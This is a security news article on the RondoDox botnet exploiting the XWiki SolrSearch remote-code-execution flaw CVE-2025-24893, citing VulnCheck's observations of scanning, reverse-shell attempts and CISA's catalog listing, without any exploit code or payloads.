RondoDox is targeting unpatched XWiki servers via critical RCE flaw to incorporate more devices into its botnet.
The said flaw (CVE-2025-24893) is a code injection issue in XWiki’s SolrSearch component, which allows unauthenticated users to execute arbitrary code by sending a crafted request. Although patches were released in February 2025, including versions 15.10.11, 16.4.1, and 16.5.0RC1, many servers remain unprotected.
The attack activity surged after the botnet began exploiting the vulnerability on November 3, 2025, according to a recent report from VulnCheck. Researchers observed a sharp rise in malicious traffic linked to RondoDox. The attribution is based on well-known User-Agent patterns and payload naming conventions. Payload servers have been observed distributing malicious scripts used in the botnet’s expansion campaign.
VulnCheck notes that exploitation attempts come from a diverse set of attackers, ranging from botnets and coin-miners to custom tooling and bespoke scanners.
In addition to automated botnet behavior, researchers have also observed manual probing. Reverse-shell attempts came from several IPs, including an AWS address (18.228.3[.]224) that also sent targeted OAST probes. Another source, 118.99.141[.]178, likely tied to a compromised consumer device, attempted similar shell-based commands. Meanwhile, opportunistic scanners are sweeping the internet with tools such as Nuclei, running basic system-discovery commands to confirm successful exploitation.
“Beyond reverse shells, plenty of actors are simply looking for targets, which is why we’ve seen a variety of scanners and probes from attackers. The most interesting one is an out-of-band application security testing (OAST)-based scanner using oast.fun, often associated with Nuclei and similar tools. This sort of traffic usually makes analysts’ eyes glaze over due to the sheer volume of internet-wide probing,” the report explains.
The US Cybersecurity and Infrastructure Security Agency (CISA) added CVE-2025-24893 to its Known Exploited Vulnerabilities (KEV) catalog in late October, but researchers said that exploitation was already well underway.
“CVE-2025-24893 is a familiar story: one attacker moves first, and many follow. Within days of the initial exploitation, we saw botnets, miners, and opportunistic scanners all adopting the same vulnerability. Once again, this highlights the gap between exploitation in the wild and visibility at scale. By the time an issue lands in CISA KEV, attackers are already days ahead, and early detection remains the only real advantage defenders have,” the company noted.